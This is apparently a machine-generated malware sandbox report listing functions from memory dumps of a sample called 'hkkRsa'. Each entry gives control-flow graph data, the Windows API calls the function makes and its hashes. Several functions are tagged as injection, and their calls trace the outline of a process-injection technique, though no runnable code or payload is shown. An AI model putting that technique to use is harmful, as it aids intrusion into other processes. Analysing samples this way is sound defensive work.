                                                        control_flow_graph 50 86b305c-86b30fd 52 86b30ff-86b3109 50->52 53 86b3136-86b3156 50->53 52->53 54 86b310b-86b310d 52->54 58 86b3158-86b3162 53->58 59 86b318f-86b31be 53->59 56 86b310f-86b3119 54->56 57 86b3130-86b3133 54->57 60 86b311b 56->60 61 86b311d-86b312c 56->61 57->53 58->59 62 86b3164-86b3166 58->62 69 86b31c0-86b31ca 59->69 70 86b31f7-86b32b1 CreateProcessA 59->70 60->61 61->61 63 86b312e 61->63 64 86b3189-86b318c 62->64 65 86b3168-86b3172 62->65 63->57 64->59 67 86b3176-86b3185 65->67 68 86b3174 65->68 67->67 71 86b3187 67->71 68->67 69->70 72 86b31cc-86b31ce 69->72 81 86b32ba-86b3340 70->81 82 86b32b3-86b32b9 70->82 71->64 74 86b31f1-86b31f4 72->74 75 86b31d0-86b31da 72->75 74->70 76 86b31de-86b31ed 75->76 77 86b31dc 75->77 76->76 78 86b31ef 76->78 77->76 78->74 92 86b3342-86b3346 81->92 93 86b3350-86b3354 81->93 82->81 92->93 96 86b3348 92->96 94 86b3356-86b335a 93->94 95 86b3364-86b3368 93->95 94->95 97 86b335c 94->97 98 86b336a-86b336e 95->98 99 86b3378-86b337c 95->99 96->93 97->95 98->99 100 86b3370 98->100 101 86b338e-86b3395 99->101 102 86b337e-86b3384 99->102 100->99 103 86b33ac 101->103 104 86b3397-86b33a6 101->104 102->101 105 86b33ad 103->105 104->103 105->105
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 086B329E
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: c0c81472b188cb130c91fdd199cc73d60f370bd70e72c8922837e4af9172c308
                                                        • Instruction ID: 6a194c0fd9ba2f1749aba8234a20aee61d22a18032d29358c742e32affe049d8
                                                        • Opcode Fuzzy Hash: c0c81472b188cb130c91fdd199cc73d60f370bd70e72c8922837e4af9172c308
                                                        • Instruction Fuzzy Hash: F6A15871E00259DFDB20DFA8C981BEEBAF2BF48305F158169E849A7340DB749985CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 086B3068 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 107 86b3068-86b30fd 109 86b30ff-86b3109 107->109 110 86b3136-86b3156 107->110 109->110 111 86b310b-86b310d 109->111 115 86b3158-86b3162 110->115 116 86b318f-86b31be 110->116 113 86b310f-86b3119 111->113 114 86b3130-86b3133 111->114 117 86b311b 113->117 118 86b311d-86b312c 113->118 114->110 115->116 119 86b3164-86b3166 115->119 126 86b31c0-86b31ca 116->126 127 86b31f7-86b32b1 CreateProcessA 116->127 117->118 118->118 120 86b312e 118->120 121 86b3189-86b318c 119->121 122 86b3168-86b3172 119->122 120->114 121->116 124 86b3176-86b3185 122->124 125 86b3174 122->125 124->124 128 86b3187 124->128 125->124 126->127 129 86b31cc-86b31ce 126->129 138 86b32ba-86b3340 127->138 139 86b32b3-86b32b9 127->139 128->121 131 86b31f1-86b31f4 129->131 132 86b31d0-86b31da 129->132 131->127 133 86b31de-86b31ed 132->133 134 86b31dc 132->134 133->133 135 86b31ef 133->135 134->133 135->131 149 86b3342-86b3346 138->149 150 86b3350-86b3354 138->150 139->138 149->150 153 86b3348 149->153 151 86b3356-86b335a 150->151 152 86b3364-86b3368 150->152 151->152 154 86b335c 151->154 155 86b336a-86b336e 152->155 156 86b3378-86b337c 152->156 153->150 154->152 155->156 157 86b3370 155->157 158 86b338e-86b3395 156->158 159 86b337e-86b3384 156->159 157->156 160 86b33ac 158->160 161 86b3397-86b33a6 158->161 159->158 162 86b33ad 160->162 161->160 162->162
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 086B329E
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 47306cfafa482f698317a21dfad6532454c7e011dd90630c23db437ec2f9013c
                                                        • Instruction ID: 332f154d4d6e1e16ac83e4d3861e7682f946fe9d409ecd1802b1fc87f9f4a266
                                                        • Opcode Fuzzy Hash: 47306cfafa482f698317a21dfad6532454c7e011dd90630c23db437ec2f9013c
                                                        • Instruction Fuzzy Hash: 84915971E00259DFDB20DFA8C981BEEBAF2BF48315F158169E809A7340DB749985CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E09A98 Relevance: 1.7, APIs: 1, Instructions: 174COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 164 2e09a98-2e09aa0 165 2e09aab-2e09aad 164->165 166 2e09aa6 call 2e076f4 164->166 167 2e09ac3-2e09ac7 165->167 168 2e09aaf 165->168 166->165 169 2e09ac9-2e09ad3 167->169 170 2e09adb-2e09b1c 167->170 217 2e09ab5 call 2e09d20 168->217 218 2e09ab5 call 2e09d10 168->218 169->170 175 2e09b29-2e09b37 170->175 176 2e09b1e-2e09b26 170->176 171 2e09abb-2e09abd 171->167 172 2e09bf8-2e09ceb GetModuleHandleW 171->172 214 2e09cf4-2e09d08 172->214 215 2e09ced-2e09cf3 172->215 178 2e09b39-2e09b3e 175->178 179 2e09b5b-2e09b5d 175->179 176->175 181 2e09b40-2e09b47 call 2e08cdc 178->181 182 2e09b49 178->182 180 2e09b60-2e09b67 179->180 183 2e09b74-2e09b7b 180->183 184 2e09b69-2e09b71 180->184 185 2e09b4b-2e09b59 181->185 182->185 188 2e09b88-2e09b8a call 2e08cec 183->188 189 2e09b7d-2e09b85 183->189 184->183 185->180 193 2e09b8f-2e09b91 188->193 189->188 194 2e09b93-2e09b9b 193->194 195 2e09b9e-2e09ba3 193->195 194->195 197 2e09bc1-2e09bce 195->197 198 2e09ba5-2e09bac 195->198 204 2e09bd0-2e09bee 197->204 205 2e09bf1-2e09bf7 197->205 198->197 200 2e09bae-2e09bbe call 2e08cfc call 2e08d0c 198->200 200->197 204->205 215->214 217->171 218->171
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02E09CDE
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.449243058.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2e00000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 7abb5603a5d95866c0bfa36fedbec6d07aa4730925d78f3fe678377b4345a7c6
                                                        • Instruction ID: 4f2b64c1979cf2a1e0d81a061261e1ffff1e9fa200fbdcd5c070ead420d2ecf9
                                                        • Opcode Fuzzy Hash: 7abb5603a5d95866c0bfa36fedbec6d07aa4730925d78f3fe678377b4345a7c6
                                                        • Instruction Fuzzy Hash: EC611770A00B058FD764DF29D0A075AB7F1BF88714F108A2ED48ADBA91DB35E846CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 086B5400 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 335 86b5400-86b5404 336 86b5406-86b540c 335->336 337 86b53a4-86b53a5 335->337 340 86b540f-86b5440 336->340 341 86b5453-86b5471 336->341 338 86b53ab-86b53ae 337->338 339 86b53a7-86b53a9 337->339 347 86b53b4-86b53c5 FindCloseChangeNotification 338->347 339->338 340->341 342 86b54bf-86b54d2 call 86b4e68 341->342 343 86b5473-86b5480 call 86b4b5c 341->343 353 86b54ab-86b54b0 343->353 354 86b5482-86b54a5 343->354 351 86b53ce-86b53f6 347->351 352 86b53c7-86b53cd 347->352 352->351 353->342 355 86b54b2-86b54bc 353->355 354->353 355->342
                                                        APIs
                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,086B5211,?,?), ref: 086B53B8
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: ChangeCloseFindNotification
                                                        • String ID:
                                                        • API String ID: 2591292051-0
                                                        • Opcode ID: 40e98f200e590c6f4356fdbc8ba7c371dac1883e48f3742a0aae1f695658071b
                                                        • Instruction ID: ceac2b2edfac6deb32abb67223c154ab75cde35bc104462c48cf3e119e47e0c0
                                                        • Opcode Fuzzy Hash: 40e98f200e590c6f4356fdbc8ba7c371dac1883e48f3742a0aae1f695658071b
                                                        • Instruction Fuzzy Hash: 9D3147766406058FC721DF6DC4483DDBBE2BF84326F19846EC15ACB762DB389486CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E0565C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 361 2e0565c-2e05663 362 2e05668-2e05729 CreateActCtxA 361->362 364 2e05732-2e0578c 362->364 365 2e0572b-2e05731 362->365 372 2e0579b-2e0579f 364->372 373 2e0578e-2e05791 364->373 365->364 374 2e057b0 372->374 375 2e057a1-2e057ad 372->375 373->372 377 2e057b1 374->377 375->374 377->377
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 02E05719
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.449243058.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2e00000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 6d5ef716357cd19e7203f86deccb5e4b225c60ec4653bee4db7facb4b74fa806
                                                        • Instruction ID: 85afae1549163a0fcee3347a62df1d48dffe775698a9571e13ce213dab5e7c27
                                                        • Opcode Fuzzy Hash: 6d5ef716357cd19e7203f86deccb5e4b225c60ec4653bee4db7facb4b74fa806
                                                        • Instruction Fuzzy Hash: F841F671C4061DCFDB24DF99C884BCDBBB5BF48304F648069D409AB250D7756986DF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E04124 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 378 2e04124-2e05729 CreateActCtxA 381 2e05732-2e0578c 378->381 382 2e0572b-2e05731 378->382 389 2e0579b-2e0579f 381->389 390 2e0578e-2e05791 381->390 382->381 391 2e057b0 389->391 392 2e057a1-2e057ad 389->392 390->389 394 2e057b1 391->394 392->391 394->394
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 02E05719
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.449243058.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2e00000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 96be9b0d0422a3ce6c1c756cb8deba8d01332c40bc607dd2c1923cb027973b17
                                                        • Instruction ID: 9bea3bb581512f7fd2d51e029c48ca9511734b78061694387037cbd3267cc13a
                                                        • Opcode Fuzzy Hash: 96be9b0d0422a3ce6c1c756cb8deba8d01332c40bc607dd2c1923cb027973b17
                                                        • Instruction Fuzzy Hash: 2741F470C4061DCFDB24DF99C884BDEBBB5BF48304F548069D409AB291D7B46986DF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 086B2DD8 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 395 86b2dd8-86b2e2e 398 86b2e3e-86b2e7d WriteProcessMemory 395->398 399 86b2e30-86b2e3c 395->399 401 86b2e7f-86b2e85 398->401 402 86b2e86-86b2eb6 398->402 399->398 401->402
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 086B2E70
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 3981ce0d24675dfebbe52519c8c3bdec48a181ad19bd1a2356f36ee91c88edeb
                                                        • Instruction ID: c2f2cd0c5599d2922abf14fa19cd794e67c74007776515089a956cf871e40985
                                                        • Opcode Fuzzy Hash: 3981ce0d24675dfebbe52519c8c3bdec48a181ad19bd1a2356f36ee91c88edeb
                                                        • Instruction Fuzzy Hash: 172148B19003599FCB10CFAAC8847EEBBF4FF48310F54842AE819A7350C778A955CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 086B2DE0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 406 86b2de0-86b2e2e 408 86b2e3e-86b2e7d WriteProcessMemory 406->408 409 86b2e30-86b2e3c 406->409 411 86b2e7f-86b2e85 408->411 412 86b2e86-86b2eb6 408->412 409->408 411->412
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 086B2E70
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 86dd5b57b7f00d89c6c6a236556a5dade995cc3d4f9f679a78ab2cd476d56b71
                                                        • Instruction ID: 453ab583a1d7baf5460f1023cd3aa1065ac7af2d017ce637d68a39ca9d263174
                                                        • Opcode Fuzzy Hash: 86dd5b57b7f00d89c6c6a236556a5dade995cc3d4f9f679a78ab2cd476d56b71
                                                        • Instruction Fuzzy Hash: 842127B19003499FCB10CFAAC8847DEBBF5FF48314F548429E919A7350C7789945DBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E0A7E4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 416 2e0a7e4-2e0c08c DuplicateHandle 418 2e0c095-2e0c0b2 416->418 419 2e0c08e-2e0c094 416->419 419->418
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E0BFBE,?,?,?,?,?), ref: 02E0C07F
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.449243058.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2e00000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 7da37be7313c8837d55896be97a1034f55e16bd77f783238c95ee1b692ca60eb
                                                        • Instruction ID: a9eb3307a020c5ae8c732f52159860df9687db01cbf281f9aa15bad4edcdefe9
                                                        • Opcode Fuzzy Hash: 7da37be7313c8837d55896be97a1034f55e16bd77f783238c95ee1b692ca60eb
                                                        • Instruction Fuzzy Hash: 1F2103B59002099FCB10CFAAD984ADEBBF8EB48320F14841AE814B7350D374A984CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 086B2EC8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 422 86b2ec8-86b2f5d ReadProcessMemory 425 86b2f5f-86b2f65 422->425 426 86b2f66-86b2f96 422->426 425->426
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 086B2F50
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 7c4556b595083883d8b60a987581327df5cf2ebc5e07c4819f048c6e9331e59a
                                                        • Instruction ID: 5a24713f4621767d844b2f40c834fd7897f1db8a1aa9a72182fe92992a86e013
                                                        • Opcode Fuzzy Hash: 7c4556b595083883d8b60a987581327df5cf2ebc5e07c4819f048c6e9331e59a
                                                        • Instruction Fuzzy Hash: 222134B1C003099FCB10CFAAC9806EEBBF5FF48310F50842AE419A7240C7789A41DBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 086B2ED0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 430 86b2ed0-86b2f5d ReadProcessMemory 433 86b2f5f-86b2f65 430->433 434 86b2f66-86b2f96 430->434 433->434
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 086B2F50
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: ca01ae02aa8da45e4acdd178e1670c5de97976db7925d415ea1e87aeb3c3decc
                                                        • Instruction ID: 9912d6609bd8a990eabf68940a3d2b52de4f1c36f86f287361aae770496f7fa6
                                                        • Opcode Fuzzy Hash: ca01ae02aa8da45e4acdd178e1670c5de97976db7925d415ea1e87aeb3c3decc
                                                        • Instruction Fuzzy Hash: 242107B1D003599FCB10DFAAC884AEEBBF5FF48310F54842EE519A7240C7799944DBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E0BFF2 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 438 2e0bff2-2e0c08c DuplicateHandle 439 2e0c095-2e0c0b2 438->439 440 2e0c08e-2e0c094 438->440 440->439
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E0BFBE,?,?,?,?,?), ref: 02E0C07F
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.449243058.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2e00000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 3244f7a3cee69af2c743b54adcd6775878e076b4a3394acfccf34f1d93e0d224
                                                        • Instruction ID: d2dd28520bd545a9acfb4fcb64300e8f6c66d8d781a62b6a8412780400068e61
                                                        • Opcode Fuzzy Hash: 3244f7a3cee69af2c743b54adcd6775878e076b4a3394acfccf34f1d93e0d224
                                                        • Instruction Fuzzy Hash: 0421E4B5D002089FDB10CFA9D984ADEBBF4EF48310F14841AE854B7350D374A945DFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 086B2D1A Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 443 86b2d1a-86b2d9b VirtualAllocEx 447 86b2d9d-86b2da3 443->447 448 86b2da4-86b2dc9 443->448 447->448
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 086B2D8E
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 3e5dd48bb7f62dfa6b39d5c56c12bb2725854869a96ba31d50c0bcd0f50b5992
                                                        • Instruction ID: 7ca0d662509d1c5e6f982a11fe61ef7ea2d9a28d1db62bfde74a92dd9df805fb
                                                        • Opcode Fuzzy Hash: 3e5dd48bb7f62dfa6b39d5c56c12bb2725854869a96ba31d50c0bcd0f50b5992
                                                        • Instruction Fuzzy Hash: C01147729002489FCB10DFAAD8446DEBBF5EF48320F148819E415A7650CB75A940CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E08D38 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E09D59,00000800,00000000,00000000), ref: 02E09F6A
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.449243058.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2e00000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 30aa41f9d09e568d875dcfd28db0df33ec2332dc60503e9ba1568dfe57efc277
                                                        • Instruction ID: 1c3df97b5426ba4ac4a684862d265918848f3bf45b579e7b456cdac73bd24813
                                                        • Opcode Fuzzy Hash: 30aa41f9d09e568d875dcfd28db0df33ec2332dc60503e9ba1568dfe57efc277
                                                        • Instruction Fuzzy Hash: 391114B69002098FCB10CF9AC884BEEFBF8EB88714F14842AE455B7241C774A585CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 086B2D20 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 086B2D8E
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 569a68e0ceb209effc23304ab745b6bc42f777d01029220453f494c984827f2f
                                                        • Instruction ID: 664bffcd99b4cede3bcce1c8ebb3c513c080d1f9a5deec43afa2611e50d93998
                                                        • Opcode Fuzzy Hash: 569a68e0ceb209effc23304ab745b6bc42f777d01029220453f494c984827f2f
                                                        • Instruction Fuzzy Hash: D51137729002499FCB10DFAAC844BDFBFF5EF88324F148819E515A7250CB75A950DFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E09EF8 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E09D59,00000800,00000000,00000000), ref: 02E09F6A
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.449243058.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2e00000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: cf70fcea75b1bfcef8f887c6016eac1ed1685d35e813e9de7df7ed7256a1e77b
                                                        • Instruction ID: a77c4024035b765fc0312ac93485108f44456dc84e7d43e8d0a24ff1257202d1
                                                        • Opcode Fuzzy Hash: cf70fcea75b1bfcef8f887c6016eac1ed1685d35e813e9de7df7ed7256a1e77b
                                                        • Instruction Fuzzy Hash: 3511F6B6D002098FCB10CF9AC584BDEFBF4AB48714F14842AD455B7641C374A585CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 086B2930 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 3d21688adae13de1eb72be5110583b9b5f1bb6445016470a9705f49c49f19c91
                                                        • Instruction ID: df98de4b9ffbd6bf2661990cf905c7b829be7f25b582d6411fca9c2fb6fe58ef
                                                        • Opcode Fuzzy Hash: 3d21688adae13de1eb72be5110583b9b5f1bb6445016470a9705f49c49f19c91
                                                        • Instruction Fuzzy Hash: 3A1158B1D002488ECB10DFAAC5447EEFBF4AF88324F14881ED459B7740C779A944CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 086B5358 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,086B5211,?,?), ref: 086B53B8
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: ChangeCloseFindNotification
                                                        • String ID:
                                                        • API String ID: 2591292051-0
                                                        • Opcode ID: 2ebd6167606a3030423fa9dd077340af428d0baf5eec4adce092f99fd9b8302d
                                                        • Instruction ID: 49d89e59cd2879b9bcf0d5c93826da79d3ac0c519892975beceff1af1d12446d
                                                        • Opcode Fuzzy Hash: 2ebd6167606a3030423fa9dd077340af428d0baf5eec4adce092f99fd9b8302d
                                                        • Instruction Fuzzy Hash: 9B1125B58003498FCB10CF9AC588BDEBFF4EB48320F14846AD455A7741D778A585DFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 086B4B34 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,086B5211,?,?), ref: 086B53B8
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: ChangeCloseFindNotification
                                                        • String ID:
                                                        • API String ID: 2591292051-0
                                                        • Opcode ID: aa73c4c1ee02012648ea03f412c7c62a621e0d71e547fa236302f40a46c52b48
                                                        • Instruction ID: e93a87d808f061ffdbadf615a73283f67f0280d9c9f5536c9d712c9b33d6a737
                                                        • Opcode Fuzzy Hash: aa73c4c1ee02012648ea03f412c7c62a621e0d71e547fa236302f40a46c52b48
                                                        • Instruction Fuzzy Hash: 8B1136B59007098FCB10DF9AC588BEEBBF4EB48324F148429E459B7340D378A984CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 086B2938 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
